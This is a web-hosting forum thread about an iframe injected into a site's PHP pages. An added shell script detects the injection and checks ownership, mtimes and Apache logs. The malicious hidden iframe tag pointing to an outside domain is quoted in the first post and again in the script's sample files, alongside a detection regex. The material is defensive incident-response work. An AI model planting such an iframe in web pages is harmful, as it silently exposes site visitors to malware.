iframe worm or malware infected my php pages


  #1 (Join Date: Dec 2004)

    Hi there,
    Recently some users told me that their antivirus software warns them when they visit my web site, telling them that malware is present.
    Now my site has been reported as suspicious, and Firefox and IE block access to it. Google has also suspended my AdWords account.

    After some research I found that someone/something inserted the code:

    <iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden">

    on some index.php files (not all of them) and only from one web site (on the server there are many websites hosted).

    On the server runs Apache/2.2.11 (FreeBSD).

    I've removed the code, but the problem could reappear, so I must get to the source: how was the code inserted, by whom, and is the server compromised?

    Does anyone know something about this? What should I do further?

    rkhunter and chkrootkit say that everything is ok.

    Thank you
    Best regards,

  #2 (Join Date: Sep 1999)
    Should've looked at the permissions and ownership of the file before changing it... that could tell you what account had rights to do it. I'd grep for the file name(s) in the various bash_history files, etc.

  #3 (Join Date: Nov 2002)
    I'd venture to guess that it wasn't someone who had shell access to the server. It was probably brought in via an FTP client, either on purpose or one that was compromised. If you have another one you can check the modified time and look for FTP logs...
    but really, I don't know what I'm talking about.

  #4 (Join Date: Apr 2001, SF Bay Area, CA)
    Quote Originally Posted by ddaas:
        on some index.php files
    Disable PHP?

    You probably have some insecure page somewhere else (directory traversal, not securing access, something like that) which is allowing someone to add this HTML to all these pages. It's very likely one of your PHP scripts. If you disable PHP, I bet that will prevent any future occurrences of this.

    Alternately, if this site has WebDAV enabled (...why?), then someone might have learned your username and password (...you do use one when using WebDAV, right?) and used that to modify the files. Disabling WebDAV would work, in that case.

    If it was a script, and you can find out which script they used, you can either fix it, or upgrade it to a non-vulnerable version (...you *do* monitor the security lists for all the PHP stuff you have installed, right? third-party forum pages, blog software, and whatever else?). But finding that out might be hard. If you had the modification time of the various .php files (which you destroyed when you changed them again), you could try to correlate that with entries in the Apache logs (which would catch both WebDAV and problematic PHP stuff), but that's going to be hard now. Though it may have been impossible before as well, as the attacker may have been able to remove their log entries. Don't know for sure though.

    There have been several rashes of automated compromises of various PHP-based webpage packages, about a year ago or so. (Various forums, various blog generators, etc.) I've stopped paying attention since then, since I've sworn off PHP entirely. Wouldn't surprise me if someone found that your site used some vulnerable version of some PHP thing (via some search engine, is how they did it last year), and used that vulnerability to compromise the server.
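The triage steps suggested in posts #2, #3 and #4 (find every page carrying the injected iframe, record owner/mode/mtime before touching the files, then pull the requests from the Apache log that could have written them) as one shell script. This is an added example, not code from anyone in the thread: the web root, the infected pages and the access-log lines are constructed for the demonstration, and the hour-of-modification heuristic for the log search is an assumption about how you would narrow the search without a proper timestamp parser.

```shell
# Added example, not from the thread: first-pass triage of an injected hidden
# iframe on a shared PHP host. Sample data below is constructed.

# The string the poster found, loosened so small variations still match.
IFRAME_RE='<iframe[^>]*(width=1|height=1|visibility: *hidden)'

# List every page under a web root that carries the hidden iframe.
find_injected() {                       # $1 = web root
    find "$1" -type f \( -name '*.php' -o -name '*.html' -o -name '*.htm' \) \
        -exec grep -lE "$IFRAME_RE" {} + 2>/dev/null | sort
}

# Owner, group, mode and mtime of a file: capture this BEFORE cleaning it,
# since editing the file destroys the mtime (post #4's complaint).
# GNU stat and BSD stat take different flags, so try GNU first, then BSD.
file_facts() {                          # $1 = file
    stat -c '%U %G %a %y %n' "$1" 2>/dev/null \
        || stat -f '%Su %Sg %Lp %Sm %N' "$1"
}

# Apache combined-log requests from the hour the file changed that could have
# written it: POSTs to PHP scripts, or WebDAV verbs (PUT/MOVE/PROPFIND/...)
# that would point at the WebDAV theory in post #4. Plain GETs are dropped.
# Assumption: hour granularity ("dd/Mon/yyyy:HH") is a fine enough window.
log_suspects() {                        # $1 = access log, $2 = dd/Mon/yyyy:HH
    grep -F "[$2:" "$1" | grep -E '"(POST|PUT|MOVE|PROPFIND|MKCOL|DELETE) ' \
        || true
}

# Constructed sample: two vhosts, siteA has two infected index.php files,
# siteB is clean; the log has one suspicious POST and one WebDAV PUT at 14:02.
make_sample() {                         # prints the sample directory
    d=$(mktemp -d)
    mkdir -p "$d/www/siteA/blog" "$d/www/siteB"
    inj='<iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden">'
    printf '<?php echo "home"; ?>\n%s\n' "$inj" > "$d/www/siteA/index.php"
    printf '<?php echo "blog"; ?>\n%s\n' "$inj" > "$d/www/siteA/blog/index.php"
    printf '<?php echo "clean"; ?>\n' > "$d/www/siteA/about.php"
    printf '<html>clean</html>\n' > "$d/www/siteB/index.php"
    cat > "$d/access.log" <<'EOF'
10.0.0.5 - - [21/Mar/2009:13:58:01 +0100] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [21/Mar/2009:14:02:17 +0100] "POST /blog/admin.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
10.0.0.7 - - [21/Mar/2009:14:02:19 +0100] "PUT /index.php HTTP/1.1" 204 0 "-" "DAVClient/1.0"
10.0.0.9 - - [21/Mar/2009:14:30:00 +0100] "GET /about.php HTTP/1.1" 200 233 "-" "Mozilla/5.0"
EOF
    echo "$d"
}

# Stand-alone run: build the sample, list infected pages with their facts,
# then show the log entries from the hour of the (constructed) modification.
SAMPLE=$(make_sample)
echo "== infected pages =="
find_injected "$SAMPLE/www"
echo "== owner / mode / mtime =="
find_injected "$SAMPLE/www" | while read -r f; do file_facts "$f"; done
echo "== requests that could have written the files (hour 14) =="
log_suspects "$SAMPLE/access.log" "21/Mar/2009:14"
```

Run it as root on the real server with the real web root and the vhost's access log, and do it before re-editing anything: the owner tells you whether the writer was the FTP/shell account or the Apache user (which would implicate a PHP script), and the mtime gives you the hour to feed to the log search. A PUT, MOVE or PROPFIND in that window means WebDAV is enabled and was used; a POST to a PHP script in that window is where to start looking for the vulnerable package.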
